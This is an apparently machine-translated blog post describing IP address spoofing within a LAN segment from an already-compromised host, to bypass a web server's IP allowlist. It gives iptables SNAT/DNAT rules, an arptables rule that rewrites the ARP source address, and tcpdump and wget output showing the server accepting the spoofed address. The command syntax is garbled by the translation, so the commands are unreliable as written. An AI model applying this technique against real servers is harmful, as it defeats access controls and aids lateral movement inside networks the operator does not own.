Test IP Address Spoofing in the same network segment using the Firewall

Tm3yShell7 blog

We know that TCP/IP is based on different levels of addressing, and the information to be transmitted is often routed to the corresponding subnet Based on the ip address, then, find the host based on the mac address in the subnet.

It can be seen that the host knows that the data does not require an ip layer route when it ensures that the target host is in the same network segment as the host, therefore, the addressing of this data in its own network segment is based entirely on the mac address. In this case, our changes to the layer-3 IP address will not affect data transmission over the network.

In this way, we can forge IP addresses of the same network segment at will, perform IP Address Spoofing, and ensure communication accessibility.

In theory, this work is achieved through pcap programming, although no finished program has been implemented on the Internet so far. What's interesting now is that we will use a firewall to protect our security. The main use point is the part where iptables implements the nat Function.

The two firewalls are netfilter/iptables and ebtables (arptables)

In order to make this discussion valuable, we imagine this situation, which is also a real situation I have encountered: we have obtained control of the machine 192.168.254.130, our target machine is 192.168.254.1 of the same network segment. The web service of this machine limits that only 192.168.254.22 can be accessed.
192.168.254.1 (target server host ):

192.168.254.130 (the host we have controlled ):

First, modify the packages sent from the local host to the target host:
The source address is local (-s 192.168.254.130) and the destination address is 192.168.254.1 (-d 192.168.254.1). Port 80/tcp (-p tcp-dport 80) packet in the POSTROUTING chain for the so-called NAT (SNAT, modify the source address to 192.168.254.22 ):
# Iptables-t nat-a postrouting-p tcp-dport 80-s 192.168.254.130-d 192.168.254.1-j SNAT-to 192.168.254.22

Then modify the data packets returned from the local machine to the target host:
The parameter meaning is basically the same as above (DNAT, modify the destination address to the local machine, so that the local Nic can capture this packet)
# Iptables-t nat-a prerouting-p tcp-sport 80-s 192.168.254.1-d 192.168.254.22-j DNAT-to 192.168.254.130

Is that okay? At first, I thought this would work. so lets check it out:
# Tcpdump-nn-I eth0> test. dmp & # see if the packet transfer in the way we think
# Wget http: // 192.168.254.1/1.php

The result is a timeout. Let's see where the problem is:
# Cat test. dmp
03:48:01. 963477 arp who-has 192.168.254.1 tell 192.168.254.130
03:48:02. 377828 arp reply 192.168.254.1 is-at 00: 50: 56: c0: 00: 08
03:48:02. 399608 IP 192.168.254.22.59152> 192.168.254.1.80: S 3652953733: 3652953733 (0) win 5840 <mss 1460, sackOK, timestamp 21218394 0, nop, wscale 6>
03:48:02. 456238 arp who-has 192.168.254.22 tell 192.168.254.1
03:48:02. 513615 arp who-has 192.168.254.22 tell 192.168.254.1
03:48:03. 513636 arp who-has 192.168.254.22 tell 192.168.254.1
03:48:04. 956832 arp who-has 192.168.254.22 tell 192.168.254.1
03:48:05. 513691 arp who-has 192.168.254.22 tell 192.168.254.1
03:48:06. 090730 IP 192.168.254.22.59152> 192.168.254.1.80: S 3652953733: 3652953733 (0) win 5840 <mss 1460, sackOK, timestamp 21221394 0, nop, wscale 6>
03:48:06. 513826 arp who-has 192.168.254.22 tell 192.168.254.1
03:48:10. 958625 arp who-has 192.168.254.22 tell 192.168.254.1
03:48:11. 514137 arp who-has 192.168.254.22 tell 192.168.254.1

As we can see, directly sending tcp packets labeled with ip addresses and mac addresses does not seem to allow the host to cache the mac address of the source host, therefore, we should also change the source address in the arp request frame when the host queries the mac address of 192.168.254.1.

Because iptables works on the third layer, ebtables (arptables) must be used to modify arp frames)

# Arptables-a output-s 192.168.254.130-d 192.168.254.1-j mangle-ip-s 192.168.254.22

Similarly, the role of-mangle-ip-s is "Mangles Source IP Address to given value." In this way, the target host will no longer broadcast frames to find the mac Address of host 22.
To send arp requests to host 1, you need to clear the local arp cache:
# Arp-d 192.168.254.1
# Tcpdump-nn-I eth0> test0.dmp &
# Wget 192.168.254.1/ip. php
-04:05:51-http: // 192.168.254.1/ip. php
Connecting to 192.168.254.1: 80... Connected.
HTTP request sent, awaiting response... 200 OK
Length: 15 [text/html] Saving to: 'IP. php'
100% [============================================== >] 15 -. -K/s in 0 s
04:05:51 (1.93 MB/s)-'IP. php' saved [15/15]

The ip. php function is the real client ip Address:
# Cat ip. php
192.168.254.22

We can see that our deception has been successful.